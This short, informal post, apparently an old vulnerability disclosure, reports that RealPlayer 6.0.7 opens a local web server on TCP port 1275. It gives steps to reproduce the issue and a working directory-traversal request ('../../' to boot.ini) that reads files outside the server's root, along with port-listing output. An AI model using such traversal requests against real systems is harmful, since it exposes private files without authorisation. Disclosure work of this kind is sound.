hi open RealPlayer, go to --> File ---> Open File.. ---> Select any real media file.. ex: c:\music\file.ram Play the file. Now go to ---> View ---> Clip Source realplayer will open the url http://127.0.0.1:1275/template.html?src=file://C:/music/file.ram from now realplay.exe will listen on port 1275 TCP as you can see, real player have a (Mini WebServer) that listen on port 1275 I only tested the ../../ bug GET http://127.0.0.1:1275/../../../../../boot.ini Result: my boot.ini Vulnerable version: 6.0.7 other version? maybe.. C:\>fport |grep real Pid Process Port Proto Path 1964 realplay -> 1275 TCP C:\Program Files\Real\RealPlayer\realplay.exe §ome1 exe@flashmail.com
